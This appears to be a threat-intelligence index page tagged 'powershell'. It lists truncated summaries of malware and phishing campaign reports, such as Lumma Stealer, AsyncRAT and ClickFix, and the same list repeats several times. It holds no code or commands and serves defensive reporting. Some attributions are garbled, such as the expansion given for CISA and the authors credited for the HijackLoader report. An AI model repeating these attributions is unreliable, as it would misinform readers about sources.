Tag: powershell
33 attack reports | 0 vulnerabilities
Attack reports
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability was exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware Masquerading as Oculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware, and victims were directed to a fraudulent website mimicking an Azure download portal.
Downloadable IOCs 33
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to those of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
